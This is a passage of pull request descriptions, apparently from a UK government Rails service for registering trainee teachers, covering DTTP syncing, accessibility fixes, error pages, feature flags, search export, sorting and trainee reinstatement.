It introduces a way to create a digest (json string representation) of the trainee's state and hash it using `Digest::SHA1.hexdigest`. We then save this sha into a new field `dttp_update_sha` when the trainee has been successfully updated. 
The next time the job runs, if the trainee hasn't been updated the `trainee.sha` method will always return the same sha and match up to the what was saved via `dttp_update_sha` so the trainee is skipped. If the trainee has been updated, `trainee.sha` will return a new sha and trigger an update job.

[926] Prevent re-syncs if a trainee has already been updated to DTTP

---

lib/tasks/example_data.rake

Example data bug where a dttp_id validation on the user model was being triggered as the example data did not create a dttp_id for a persona. 
Add dttp_id with correct format to pass validation

Example Data Bug

---

app/components/navigation_bar/view.html.erb

The primary nav in the header (from the design system) has the aria-label on the UL, not the nav. This makes the two consistent.

Move aria label to match design system

---

app/components/header/view.html.erb
app/components/navigation_bar/view.html.erb

This reverts #491, and instead moves the `aria-label` from the ul to the nav.
This is a change already planned by the design system (flagged by a validator, like ours was), so we're getting ahead of the curve.
Also updated the label on the account menu to more accurately describe its purpose.

Move aria-labels to Navs

---

app/views/trainees/index.html.erb

When the heading is read with a screen reader it's not super obvious what the number in brackets means. This adds extra text so it reads something like "Draft records, 5 draft records", which I think is clearer.

Add hidden text to make the count clearer

---

app/components/summary_card/style.scss

Summary lists have a border between each item. We don't need it on the last item as it's already in a summary-card which nicely contains it. There was already css to remove it, but it only worked on tablet breakpoints and higher as the border is done differently on mobile.
Before:
After:

Remove summary card bottom border on mobile

---

app/lib/dttp/params/degree_qualification.rb
spec/lib/dttp/params/degree_qualification_spec.rb

https://trello.com/c/BtrW9NYu/1002-adr-for-cron-jobsnonuk-degree-not-sent-to-dttp
- Update  `Dttp::Params::DegreeQualification` to include degree grade params for UK degrees only

[1002] Remove dfe_ClassofDegreeId (grade) from Non-UK degrees DTTP payload

---

app/controllers/application_controller.rb
app/helpers/support_email_helper.rb
app/views/errors/forbidden.html.erb
app/views/layouts/application.html.erb
app/views/pages/home.html.erb
app/views/sign_in/index.html.erb
app/views/sign_in/new.html.erb
app/views/trainees/new.html.erb
app/views/trainees/not_supported_route.html.erb
config/locales/en.yml
config/settings.yml
spec/components/application_record_card/view_spec.rb
spec/features/trainees/viewing_an_existing_trainee_spec.rb
spec/helpers/support_email_helper_spec.rb

When a user tries to navigate to a trainee that does not 'belong' to them, they currently get a 500. They should get a forbidden page (403).
- Forbidden page renders when a user attempts to access a trainee that does not belong to them.
- Refactor support email into locale
- Refactor 'Assessment only' text into locale
- Fix homepage tab title
- Pull down the code and boot up the server
- Sign in as `User A` and navigate to a trainee
- Copy the URL
- Sign out and sign in as `User B`
- Paste the URL into the address bar
- Watch the error message & check the email link
- Navigate to homepage and check that the title of the tab appears
- Check support links work everywhere
- Check the words `Assessment only` appears correctly where it should.

[973] Add forbidden error page

---

app/components/trainees/confirmation/degrees/view.html.erb

Remove govuk-button class to fix alignment when viewed in a narrow browser.
Before:
After:

Fix Delete degree button

---

app/jobs/recommend_for_qts_job.rb
app/services/dttp/recommend_for_qts.rb
spec/jobs/recommend_for_qts_job_spec.rb

https://trello.com/c/fzP32oka/925-s-set-dttp-state-when-we-submit-for-qts
Makes two separate calls to update the trainee status (contact and placement assignment) in DTTP.
This follows the pattern as suggested in https://github.com/DFE-Digital/register-trainee-teachers/pull/466 (see `DeferJob` and `Withdraw Job`.

[952] Set standards met in DTTP

---

app/views/errors/forbidden.html.erb
app/views/errors/internal_server_error.html.erb
app/views/errors/not_found.html.erb
app/views/errors/unprocessable_entity.html.erb
app/views/layouts/error.html.erb

- https://trello.com/c/d6ITjwBW/1011-error-pages-has-2-main-elements
- Create a base error layout which error views can extend. The base itself inherits from `application.html.erb`
- Remove previously generated duplicated markup

[1011] Refactor error pages to remove duplicated markup

---

app/views/errors/forbidden.html.erb
app/views/errors/internal_server_error.html.erb
app/views/errors/not_found.html.erb
app/views/errors/unprocessable_entity.html.erb
app/views/layouts/application.html.erb
app/views/pages/home.html.erb
app/views/sign_in/index.html.erb
app/views/sign_in/new.html.erb
config/settings.yml
config/settings/production.yml
config/settings/review.yml

Hide feedback links and feedback forms behind a feature flag in production for the trial.
- Add homepage feedback form into component
- Add feature flag for homepage feedback form
- Add feature flag for support link
- Disable feedback form and support link in production env
Check that the support links and feedback forms do not appear on the review app. (https://rtt-review-pr-502.herokuapp.com)
Check that the support links and feedback forms do appear on localhost.

[1013] Remove feedback and support links from production env

---

app/views/trainees/trainee_ids/edit.html.erb
app/views/trainees/training_details/edit.html.erb

https://trello.com/c/Ymsov7au/1021-dev-add-content-to-trainee-id-optional-page
Copy change to hint text in trainee id form, found on two views. Added HTML to avoid having a really long line and to make it resize correctly for different browsers/displays.

[1021] Copy change to Trainee ID forms

---

app/views/pages/accessibility.html.erb

[1057] Space below heading on accessibility page

---

terraform/modules/paas/main.tf
terraform/terraform.tf
terraform/workspace-variables/production.tfvars
terraform/workspace-variables/qa.tfvars
terraform/workspace-variables/review.tfvars
terraform/workspace-variables/sandbox.tfvars

cloudfoundry plugin v13 fixes a long standing issues of not restarting the app services after deployment when only the app's environment changes.
revert instances where worker app uses blue\green
cloudfoundry = {
source  = "cloudfoundry-community/cloudfoundry"
version = "0.13.0"
}

Upgrade Cloud Foundry plugin to v13

---

app/components/trainees/filters/style.scss
app/components/trainees/filters/view.html.erb
app/components/trainees/filters/view.rb
app/controllers/trainees_controller.rb
app/helpers/summary_helper.rb
app/services/exports/trainee_search_data.rb
app/views/trainees/index.html.erb
app/webpacker/styles/application.scss
config/settings.yml
config/settings/qa.yml
config/settings/review.yml
spec/features/trainees/filtering_trainees_spec.rb
spec/services/exports/trainee_search_data_spec.rb
spec/support/page_objects/trainees/index.rb

- https://trello.com/c/X8OvI4HG/1018-s-export-trainee-list
- Adds an export function to the trainee index page to allow users to export their search/filter results
- Add the feature behind a feature flag (enabled only on QA/Review environment)
- Head to https://rtt-review-pr-516.herokuapp.com/trainees and export the result set, assert csv attachment contains the same results on the page
- Apply a filter and export again, assert results in the csv match the results on the page

[1018] Implement exporting for trainee search results

---

terraform/workspace-variables/staging.tfvars

value is now hardcoded at the resource level
Remove paas_web_app_deployment_strategy from staging.tfvars
Remove paas_web_app_deployment_strategy from staging.tfvars

Remove paas_web_app_deployment_strategy from staging.tfvars

---

app/models/user.rb
spec/models/user_spec.rb

System admins don't necessarily map to a user on DTTP.
Allow system_admin users to be created without a DTTP ID.

[xxx] Allow nil dttp_id for system_admin

---

app/models/degree.rb

https://trello.com/c/Jjn20TdA/1008-error-messages-out-of-order-on-degrees-page
Reorder validations on degree model to show error messages in correct order. The wrong order was found on both uk and non uk degree partials.

[1008] Fix order of error messages on degree partials

---

app/forms/programme_detail_form.rb
spec/forms/programme_detail_form_spec.rb

https://trello.com/c/lT3akjMG/1044-cant-type-numbers-with-voice-control-need-to-strip-whitespace
Adds method on programme details form model that, before validation, strips the whitespace from all programme date fields. This allows voice control to add space between each number and pass validation. 
https://rtt-review-pr-513.herokuapp.com/
Some of the existing tests feed in integer values so I had to convert array elements to strings in order for .gsub method to work. Some also feed in nil values, so I had to return the method if any of the array elements were nil otherwise it would also error on .gsub.

[1044] Programme Dates strip whitespace before validation

---

app/components/trainees/filters/view.html.erb

This fix mirrors a [similar fix I did on Manage](https://github.com/DFE-Digital/apply-for-teacher-training/pull/2640), where the filter container would visually get focus when checkboxes where selected.
Using the filters (typing in input, selecting and unselecting the checkboxes) should not cause visual focus to be shown on the container of the filters.
Filters should work normally on mobile when acting as a pop-over.

Fix focus styles appearing on container

---

app/helpers/application_helper.rb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/deferrals/show.html.erb
app/views/trainees/outcome_dates/edit.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/programme_details/edit.html.erb
app/views/trainees/withdrawals/show.html.erb

- Clientside validation on forms
> Code borrowed from [schools experience](https://github.com/DFE-Digital/schools-experience/blob/master/app/helpers/form_for_helper.rb)
- Disable HTML5 validation on all forms
- Replace `form_for` with `form_with`
No visual changes to see

[1046] Disable HTML5 validations on all forms

---

app/components/status_tag/view.html.erb
app/components/trainees/record_header/view.html.erb
app/webpacker/styles/application.scss
spec/features/trainees/edit_trainee_record_spec.rb

The trainee status shouldn't be nested within the H!
Move trainee status out of H1

[1041] Remove status tag from heading

---

app/components/paginated_filter/view.html.erb
app/components/trainees/filters/view.html.erb
app/components/trainees/sort_links/view.html.erb
app/components/trainees/sort_links/view.rb
app/controllers/trainees_controller.rb
app/models/trainee.rb
config/locales/en.yml
spec/components/trainees/sort_links/view_preview.rb
spec/components/trainees/sort_links/view_spec.rb
spec/models/trainee_spec.rb

https://trello.com/c/BmXu6ePA/1017-m-sorting-trainee-list
- New component to manage sort links `Trainees::SortLinks::View`
- Additional scope on trainee to sort by last name
- Fire it up locally and play around with the links on the trainee index page

[1017] Sorting trainee list

---

Makefile

Introduce space variable to make targets
This was necessary to circumvent `make console` where PaaS space name is "bat-prod"
and application name is "register-Production".
Introduce space variable to make targets

1082 makefile make console

---

app/components/trainees/filters/view.rb
spec/components/trainees/filters/view_spec.rb

https://trello.com/c/zq26DBRe/1047-when-all-filters-are-removed-the-final-url-ends-in-can-this-be-removed
- Gets rid of the `?` from the URL when all filters have been removed
- Visit the trainees index page and apply some filters then remove them.

[1047] Remove '?' from URL if all filters are removed

---

config/locales/en.yml

- https://trello.com/c/Rqz3HQUF/1092-missing-translation-on-confirmation-page-flash
Fix the diversity confirmation flash message
Before:
After:

[1092] Fix diversity flash confirmation message

---

app/components/trainees/confirmation/degrees/view.html.erb
app/webpacker/styles/application.scss
spec/support/page_objects/sections/summaries/degree_detail.rb

`.govuk-button--link` isn't a style from the Design System - so it should be under our own `.app` namespace.

Don't use GOVUK namespace for our own styles

---

app/controllers/trainees/confirm_details_controller.rb

- https://trello.com/c/WuxOa5zn/1095-origin-page-is-nil-when-confirmation-page-submitted
- https://sentry.io/organizations/dfe-bat/issues/2206888502/events/727b4bc3dce34c5e9a8de85c6edb8ed2/?environment=production&project=5552118
- Handle a possible `nil` value from the `page_tracker.last_origin_page_path` method and redirect to a sensible default path so the app doesn't blow up
Before:
After:

[1095] Origin page is nil when confirmation page submitted

---

app/controllers/trainees_controller.rb
app/helpers/trainee_helper.rb
app/views/trainees/index.html.erb
config/locales/en.yml
spec/helpers/trainee_helper_spec.rb

Changes:
* Include count of records in title and h1
* Show page number as caption if we have pagination and if we're on page 2 or greater
* Removed counts from sub sections draft and records
This makes it easier to see how many records are returned - which is more important for AT where you might need to advance past quite a bit of the page to get to the records.
The markup likely needs work - so please tell me what to fix!
I suspect the caption will want some tests - so perhaps a developer can help add these.
* Title without pagination: `Trainee records (15 records) - Register trainee teachers - GOV.UK`
* Title with pagination: `Trainee records (30 records) - page 1 of 3 - Register trainee teachers - GOV.UK`
When on page 2 or greater:
* Title without pagination: `Trainee records - …

Improve trainee list header and title

---

app/controllers/trainees_controller.rb

This PR https://github.com/DFE-Digital/register-trainee-teachers/pull/536 removed the individual counts for draft and non-draft records from the UI. This PR cleans up the controller - we don't need to count them anymore!
Remove counts for draft and non-draft trainees from the trainees controller.
No front end changes.

[xxxx] Remove no longer required counts

---

app/components/dynamic_back_link/view.rb
app/controllers/trainees/confirm_deferrals_controller.rb
app/controllers/trainees/confirm_withdrawals_controller.rb
app/views/trainees/confirm_deferrals/show.html.erb
app/views/trainees/confirm_withdrawals/show.html.erb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/deferrals/show.html.erb
app/views/trainees/degrees/edit.html.erb
app/views/trainees/degrees/type/new.html.erb
app/views/trainees/diversity/disability_disclosures/edit.html.erb
app/views/trainees/diversity/disclosures/edit.html.erb
app/views/trainees/diversity/ethnic_groups/edit.html.erb
app/views/trainees/outcome_details/confirm.html.erb
app/views/trainees/outcome_details/recommended.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/programme_details/edit.html.erb
app/views/trainees/start_dates/edit.html.erb
app/views/trainees/trainee_ids/edit.html.erb
app/views/trainees/withdrawals/show.html.erb

https://trello.com/b/BBEuhbHM/publish-register-sprint-board
- Fix the backlinks on defer and withdraw pages. The URL of these pages, e.g. `/trainees/:trainee_id/withdraw` poses a problem for `PageTracker` because it if we visit say `/trainees/:trainee_id/withdraw/confirm` beforehand, the confirm page will get removed from history after entering the `/trainees/:trainee_id/withdraw`.
- Fix url for some hardcoded backlinks
- All backlinks in form pages use the word "Back" only
- Minor I18n changes
- Visit the defer and withdraw pages. Entering the form page the backlink should bring you back to either the trainee record page (if you came from there), or the confirm page (if you came from there).
- Check that all backlines on form pages use the word "Back"

[1040] Fix backlinks

---

app/components/incomplete_section/script.js
app/components/incomplete_section/style.scss
app/components/incomplete_section/view.html.erb
app/components/incomplete_section/view.rb
app/components/trainees/sections/view.html.erb
app/components/trainees/sections/view.rb
app/forms/trn_submission_form.rb
app/views/trainees/check_details/show.html.erb
config/locales/en.yml
spec/components/incomplete_section/view_preview.rb
spec/components/incomplete_section/view_spec.rb
spec/components/pages/trainees/check_details/view_preview.rb
spec/components/trainees/sections/view_preview.rb
spec/components/trainees/sections/view_spec.rb
spec/factories/trainees.rb
spec/features/view_components_spec.rb

Adding logic to the `check-details` page which renders a link and text to sections that haven't been started, or are uncompleted.
- Add new missing details component
- Add custom CSS
- Create logic to make component dynamic
- Add missing details text to locale
- Create view preview
- Add styling for error messages
- Navigate to the check details page: https://rtt-review-pr-540.herokuapp.com/trainees/nXZr9qmsuEQ6BDPEm2qZjPpU/check-details
- Click the `Start section` link and complete the section without ticking the 'completed' checkbox at the end
- The text and link should have changed on the `/check-details` page
- Repeat for each section
- Check the view previews
- Check styling for error messages
`IncompleteSection::View`
- only get feed with values
- it a wrapper for …

[1020] missing details component

---

app/views/layouts/error.html.erb

https://trello.com/c/H0t2FXqL/1093-sign-out-link-is-missing-on-all-static-and-error-pages
Adds a button to all error pages, allowing the user to return back to the trainee list. If they're not signed in, then it will redirect back to sign in.
- Visit the error pages `/404`, `/422`, `500`
- Check that they all have a button returning you to the correct page

[1093] Add button back to site on all error pages

---

app/views/errors/forbidden.html.erb
app/views/errors/internal_server_error.html.erb
app/views/errors/not_found.html.erb
app/views/errors/unprocessable_entity.html.erb
app/views/layouts/application.html.erb
app/views/sign_in/index.html.erb
app/views/sign_in/new.html.erb
config/settings.yml
config/settings/production.yml
config/settings/review.yml

This restores the support links to the service. The intention was to not solicit feedback in the service as our trial will collect feedback offline - but we should still provide links to the support email in case something goes wrong.
Please check I've updated everything appropriately.

Restore support links by default and only hide feedback requests

---

app/components/navigation_bar/script.js
app/components/navigation_bar/style.scss
app/components/tab_navigation/style.scss
app/components/trainees/filters/style.scss
app/components/trainees/filters/view.html.erb

This pr addresses some of the focus styling issues identified in our internal accessibility bash
The tags aren't fully compliant with GDS focus styles - they accidentally leave on the default focus outline. If that's removed, they then rely on colour alone to distinguish focus. I've used a box shadow similar to GDS' link focus styles to solve this.
After:
Before:
Active tabs rely on colour alone to indicate focus. Now the 'active' bar gets a bit bigger. This is a bit different than how the design system does it, but their markup is rather different and I was trying for a simple fix.
After:
Before:
Design system:
Focus the following items in turn - each item should be distinguishable as focused without relying on a change in colour alone - eg it gets a border or something gets thicker. …

Improve focus styling

---

Makefile

Until now, Sandbox target in the make file has its `space` variable set to sandbox. However, the application `register-sandbox` is deployed to `bat-prod`. This makes it difficult to issue `make sandbox console`
The  `space` variable under the Sandbox target in the make file needs to be changed to `space=bat-prod`

Target bat-prod space for Sandbox target in Make file

---

app/views/layouts/trainee_record.html.erb
app/views/trainees/check_details/show.html.erb
app/views/trainees/review_draft/show.html.erb

https://trello.com/c/9xqHGr91/1103-change-about-their-training-to-about-their-teacher-training-on-the-trainee-overview-and-review-page
Change copy to  'about their teaching training' on three views

[1103] Add copy change

---

app/views/trainees/review_draft/show.html.erb

https://trello.com/c/9UZr8PFs/1100-bug-prod-doesnt-show-the-caption-draft-record-above-the-h1-on-the-trainee-record-overview-page
Adds caption to h1 in trainee overview/review-draft page 
Navigate to /trainees/id/check-draft by adding trainee

[1100] Add draft record caption

---

app/views/trainees/trainee_ids/edit.html.erb
app/views/trainees/training_details/edit.html.erb
config/locales/en.yml

https://trello.com/c/2vaarvWY/1107-prod-update-this-hint-text
https://trello.com/c/2PkxWXUM/1106-prod-remove-this-hint-text
https://trello.com/c/BY6xP0lb/1105-prod-change-hint-text-content-and-formatting-to-match-prototype-on-the-trainee-start-date-and-id-page-also-make-h1s-consistent
Brings app in line with prototype. Changes hint texts and h1s on training-details/edit. And removes hint text from trainee-id/edit.

[1105-1107] Copy and format changes to trainee views

---

app/views/layouts/application.html.erb

Prevent TRN number displaying as a phone number in IOS Safari
- Using Safari on an iphone
- Navigate to https://rtt-review-pr-570.herokuapp.com/trainees?page=2 and find `Shoshana McKenzie`
- Check that their TRN number does not display as a phone number 
- Click into `Shoshana McKenzie` and check that the TRN number does not display like a phone number on that page too
- You can check another review app or the trello ticket to see how the TRN number used to display
- 🚢

[1069] Prevent TRN displaying as a phone number in IOS safari

---

app/forms/personal_detail_form.rb

https://trello.com/c/ubdxzx3Y/1076-error-messages-out-of-order-on-personal-details-form
Re-orders the validations in the personal details model so that the errors appear in the correct order in the form.
- Create a new trainee
- Head to `/personal-details`
- Click continue without filling in any of the fields
- Check that the errors are rendered in the same order as the form fields

[1076] Correct ordering of personal details errors

---

app/forms/programme_detail_form.rb
spec/features/trainees/edit_programme_details_spec.rb

https://trello.com/c/BxNrRWzx/1079-partial-dates-not-restored-when-showing-validation-errors
We have two methods `def programme_start_date` and `def programme_end_date` that rehydrated the programme details form after submission.
When the date not valid (yet) i.e. partially completed, these methods fell back to creating a `Struct`. This should have been in the 'shape' of a date, however we were passing in keys like `start_year`, `start_month`, `start_day` etc. Our form didn't know what these were referencing, so did not pre-fill the fields.
The structs now have the correct keys `year`, `month`, `day`.
- Head to a trainees `programme-details/edit` page
- Partially fill in a date
- Click continue
- Check that the form field still contains your partial date.

[1079] Restore partial dates to programme details form

---

Gemfile
Gemfile.lock
app/jobs/session_store_truncate_job.rb
config/application.rb
config/settings.yml
config/sidekiq_cron_schedule.yml
db/migrate/20210224104155_add_sessions_table.rb
db/schema.rb
spec/factories/sessions.rb
spec/jobs/session_store_truncate_job_spec.rb

https://trello.com/c/jjZUDyqQ/1119-m-fix-cookie-overflow
* Replace session store cookie_store with active_record_store, gem `activerecord-session_store`
* New ActiveJob that truncates the table of rows older than 30 days (by default, can be changed with ENV variable `SESSION_DAYS_TRIM_THRESHOLD`)
* ActiveJob runs nightly (midnight), added to sidekiq-cron.
* New migration to create "sessions" table.
* Gem URL: https://github.com/rails/activerecord-session_store

[1119] Fix cookie overflow

---

app/components/status_tag/view.html.erb
app/components/task_list/view.html.erb
app/components/task_list/view.rb
spec/components/task_list/view_spec.rb
spec/features/trainees/degrees/adding_degree_spec.rb
spec/features/trainees/diversities/diversity_progress_spec.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/features/trainees/edit_programme_details_spec.rb
spec/features/trainees/edit_trainee_record_spec.rb
spec/support/features/page_helpers.rb

- https://trello.com/c/wJ9hiLdU/1054-accessibility-fix-implement-aria-describedby-relationship-to-the-task-list-links-and-tags
- Adding `aria describedby` in the link and an `id` on the corresponding status tag helps create the relationship from an accessibility point of view.

[1054] Add aria-describedby to row status

---

config/initializers/semantic_logger.rb

Logit filters are configured for the default rails duration and duration_ms format and other apps.
It is not required to swap `duration` and `duration_ms` filter.
Also now that register is logging to the same logit stack as other PaaS apps, it is required to follow the same pattern as the other apps.
Find and Publish follow the default rails format for the duration fields.
And application logs have `type: application` configured in logit filters.
Use default rails formation for `duration` and `duration_ms` fields.

Remove custom duration format

---

app/lib/dttp/access_token.rb
app/services/dttp/contact_update.rb
app/services/dttp/recommend_for_qts.rb
app/services/dttp/retrieve_qts.rb
app/services/dttp/retrieve_trn.rb
app/services/dttp/update_trainee_status.rb
spec/lib/dttp/access_token_spec.rb
spec/services/dttp/contact_update_spec.rb
spec/services/dttp/recommend_for_qts_spec.rb
spec/services/dttp/retrieve_qts_spec.rb
spec/services/dttp/retrieve_trn_spec.rb
spec/services/dttp/update_trainee_status_spec.rb

https://trello.com/c/mtDnrOOg/1150-add-status-code-to-the-errors-in-the-dttp-workers-remove
* Removed caching on `Dttp::AccessToken.fetch`
* DTTP service errors now include status and headers for easier debugging.

[1150] removed caching on dttp access_token, added status and headers to dttp service errors

---

app/views/trainees/check_details/show.html.erb

It was pointed out in show and tell that this link implied you needed to actively save drafts - which is incorrect. This updates the link to match the 'return later' link on the task list page.

Make clear you don't need to explicitly save drafts

---

app/controllers/trainees/deferrals_controller.rb
app/controllers/trainees/outcome_dates_controller.rb
app/controllers/trainees/withdrawals_controller.rb
app/forms/deferral_form.rb
app/forms/multi_date_form.rb
app/forms/outcome_date_form.rb
app/forms/withdrawal_form.rb
app/views/trainees/deferrals/show.html.erb
app/views/trainees/outcome_dates/edit.html.erb
app/views/trainees/withdrawals/show.html.erb
config/locales/en.yml
spec/features/trainees/defer_trainee_spec.rb
spec/features/trainees/recording_training_outcome_spec.rb
spec/features/trainees/withdraw_trainee_spec.rb
spec/support/page_objects/trainees/edit_deferral_date.rb
spec/support/page_objects/trainees/edit_outcome_date.rb
spec/support/page_objects/trainees/withdrawal.rb

https://trello.com/c/IU3JnBBB/1122-m-today-tomorrow-other-component
We have three form models that we _basically_ doing all the same hydration / attribute saving / error handling for:
- withdrawal
- deferral
- outcome date.
We're about to add another one (reinstate), so this PR pulls all the code into one more generic form model that the other models now subclass.
Nothing should change.

[1122] Refactor multi-date forms

---

app/components/application_record_card/view.rb
app/components/trainees/sort_links/view.rb
spec/components/trainees/sort_links/view_spec.rb

https://trello.com/c/iOUH2zu5/1088-s-snags-on-sort-links
- Renders the default sort as text (not a link) when no sort is actively applied
- Removes visited link styles
- When sorting by last name, the changes the displayed name to "Lastname, Firstnames" rather than "Firstnames Lastname"
- Changes to markup (separate card being created)
- Visit `/trainees`
- Check that with no ordering actively applied, the 'Date updated' is not a link
- Click 'Last name'
- Check that the names are displayed as "Lastname, Firstnames"
- Click 'Date updated'
- Check that no visited link styles have been applied to 'Last name' i.e. purple font

[1088] Fix sort link snags

---

app/webpacker/scripts/global/nationality_select.js
app/webpacker/styles/application.scss

The main change here is to move the remove link outside of the label - which more closely matches [Apply](https://github.com/DFE-Digital/apply-for-teacher-training/blob/d2eecada0de3058de630e964ec083cea8597f076/app/frontend/packs/nationalities-component.js#L32).
The link was also accidentally red and bold because we had global styles styling all `#` links like that to remind us to deal with them.
After:
Before:

Tidy up other nationality remove link

---

app/services/dttp/retrieve_qts.rb
spec/services/dttp/retrieve_qts_spec.rb

- https://sentry.io/organizations/dfe-bat/issues/2239722865/?environment=qa&project=5552118&referrer=alert_email
- Update the DTTP path to fetch the qts awarded property
You can test this out in postman by quering the following path:
`https://{{dttp_host}}/api/data/v9.1/dfe_placementassignments(1037728a-7928-e911-a82a-000d3ab0d281)?$select=dfe_qtsawardflag` which should return the correct json the class expects to parse.

[1193] Query the correct dttp entity path for the qts awarded flag

---

app/components/trainees/filters/style.scss

This PR adds an override to the MoJ filter to ensure it the filter remains visible at smaller viewports on desktop and also only shows the scroll bar when needed. We noticed in the bug in the accessibility audit.
Obscured filter, additional scrollbar. 😢
Filter visible, scrollbar only visible when actually has overflow 🎉
Ensure scroll bars are set to always display, resize a desktop browser to 320px, see if the filter is not obscured by viewport edge.

[1035] Fix filter display bug for smaller viewports

---

app/controllers/trainees/confirm_delete_controller.rb
app/controllers/trainees_controller.rb
app/policies/trainee_policy.rb
app/views/trainees/confirm_delete/show.html.erb
app/views/trainees/review_draft/show.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
config/routes.rb
spec/controllers/trainees/confirm_delete_controller_spec.rb
spec/controllers/trainees_controller_spec.rb
spec/features/trainees/delete_trainee_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/confirm_draft_deletions.rb
spec/support/page_objects/trainees/review_draft.rb

The ability to delete a draft trainee if the user is authorised. 
- Add new controller
- Add destroy method to trainees controller
- Add destroy? method to trainee policy
- Add user interface for deleting a draft trainee
- Add logic for rendering a trainee with or without a name
- Add page title to `en.yml`file
- Add new route
- Navigate to a draft trainee and click on it: https://rtt-review-pr-592.herokuapp.com/trainees
- Scroll down and click `Delete this draft`
- Click the red button
- Check that the trainee has been deleted.
- Check that the `confirm-delete` page displays correctly whether the trainee has a name or not.
- Check that you cannot delete a non draft trainee by navigating there in the URL

[1121] Delete draft trainee feature

---

app/views/trainees/degrees/_uk_degree_form.html.erb

https://trello.com/c/Vh9IQurw/1051-duplicate-ids-on-errors-degree-grade-field-error-no-label-on-options-invalid-size-on-links-validate-html-with-validation-errors
Only apply `link_errors: true` to the first element. It's was only intended to be on the first.
- Load up the new UK degree page and submit empty form
- Open the HTML inspector and confirm that only the first radio input element under "Degree grade" has the ID `degree-grade-field-error`. All the others are unique.

[1051] Fix: duplicate ids on radio inputs after validation error

---

.browserslistrc
app/helpers/application_helper.rb
app/views/system_admin/providers/new.html.erb
app/views/system_admin/users/new.html.erb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/degrees/_non_uk_degree_form.html.erb
app/views/trainees/diversity/disability_details/edit.html.erb
app/views/trainees/diversity/ethnic_backgrounds/edit.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/trainee_ids/edit.html.erb
app/views/trainees/training_details/edit.html.erb
app/views/trainees/withdrawals/show.html.erb
app/webpacker/packs/application.js
app/webpacker/scripts/global/disable-browser-autofill.js

https://trello.com/c/xHwsbyBY/1048-spike-1day-disable-browser-autofill-autocomplete-throughout-service
There are two parts to the solution:
Part 1: add `autocomplete="disabled"` to input field (can be any string except "off") to prevent Chrome from activating managed address auto-fill.
Part 2: A progressive enhancement solution that disables Chrome's auto suggestion based on past input values. We remove the name attribute on the given input. The script replaces the name attribute with a random string and saves it as a data attribute. When the form gets submitted all name attributes will be replaced with their previous value.
- Make sure have entered your name and address under Chrome => Preferences => Auto-fill => Addresses and more
- Visit an edit page
- Click on the field - no auto-fill …

[1048] Disable browser auto-fill

---

app/lib/dttp/params/placement_assignment_outcome.rb
app/services/dttp/recommend_for_qts.rb
spec/lib/dttp/params/placement_assignment_outcome_spec.rb
spec/services/dttp/recommend_for_qts_spec.rb

We currently send an incomplete payload when we recommend a register trainee for QTS to DTTP. This isn't sufficient to trigger the export to DQT.
* Add `Params::PlacementAssignmentOutcome` to present the correct parameters. This should currently support 'Assessment Only' candidates but we'll need to revisit this for subsequent routes.
Example data sent to dev DTTP from localhost:
To test:
* create a trainee
* submit for TRN
* set the TRN in DTTP back office
* manually run a `RetrieveTrnJob` in the console
* recommend the trainee for QTS
* state, params etc should be updated in DTTP
I'll run this in QA and confirm with the operations team.

[721] Submit some trainees for QTS and confirm with DQT

---

config/settings/review.yml

Turning on the test feedback link on the review app, so that it's in line with production
Check that the feedback link appears on the homepage using the review app
https://rtt-review-pr-611.herokuapp.com/

Enable test feedback link for review app

---

app/components/trainees/filters/style.scss
app/components/trainees/filters/view.html.erb
app/views/trainees/index.html.erb
app/webpacker/styles/application.scss
spec/support/page_objects/trainees/index.rb

https://trello.com/c/Rqn8bmoP/1165-fix-export-link-styling
Export link needs to be outside filters div.  And needs move up above the sort links on mobile. 
Move the export link outside the filter div. Add css which moves html within filter wrapper (including link) to the left on desktop. Otherwise, export link appears at top on mobile. 
Load /trainees page and check that export link is now in correct place

[1165] Fix styling on export link

---

app/components/trainees/confirmation/reinstatement_details/view.html.erb
app/components/trainees/confirmation/reinstatement_details/view.rb
app/components/trainees/record_actions/view.rb
app/components/trainees/timeline/view.rb
app/controllers/trainees/confirm_reinstatements_controller.rb
app/controllers/trainees/reinstatements_controller.rb
app/forms/reinstatement_form.rb
app/jobs/reinstate_job.rb
app/policies/trainee_policy.rb
app/services/dttp/retrieve_qts.rb
app/views/trainees/confirm_reinstatements/show.html.erb
app/views/trainees/reinstatements/show.html.erb
config/locales/en.yml
config/routes.rb
db/migrate/20210301131856_add_reinstate_date_to_trainees.rb
db/schema.rb
spec/components/trainees/confirmation/reinstatement_details/view_preview.rb
spec/components/trainees/confirmation/reinstatement_details/view_spec.rb
spec/components/trainees/timeline/view_spec.rb
spec/controllers/trainees/confirm_deferrals_controller_spec.rb
spec/controllers/trainees/confirm_reinstatements_controller_spec.rb
spec/factories/trainees.rb
spec/features/trainees/reinstating_a_trainee_spec.rb
spec/jobs/reinstate_job_spec.rb
spec/policies/trainee_policy_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/confirm_reinstatement.rb
spec/support/page_objects/trainees/record.rb
spec/support/page_objects/trainees/reinstatement.rb

https://trello.com/c/a0TK2ylu/1123-l-reinstate-trainee
This PR encapsulates everything needed to reinstate a trainee:
- A form `/reinstate` where the user can select the date the trainee returned
- A new field on a trainee `reinstate_date` to record the date
- A form `/reinstate/confirm` where the user can view the return date, change if necessary, or confirm if correct
- A new component for this confirm page
- A new `ReinstateJob` that returns the trainee/contact to 'Yet to complete course' in DTTP if they have a TRN, or 'Prospective trainee - TREFNO requested' in DTTP if they don't
- An update to the trainee timeline that handles displaying reinstatement events (since there is no actual 'state' for reinstated)
**For a trainee with a TRN**
- Pick a deferred trainee with a TRN (or defer …

[1123] Reinstate trainee

---

app/lib/dttp/code_sets/routes.rb
app/lib/dttp/mappable.rb
app/lib/dttp/params/placement_assignment.rb
app/models/trainee.rb
config/initializers/training_routes.rb
spec/components/application_record_card/view_preview.rb
spec/components/application_record_card/view_spec.rb
spec/components/trainees/confirmation/programme_details/view_preview.rb
spec/components/trainees/confirmation/trainee_id/view_preview.rb
spec/components/trainees/filters/view_preview.rb
spec/components/trainees/record_details/view_preview.rb
spec/components/trainees/timeline/view_preview.rb
spec/factories/trainees.rb
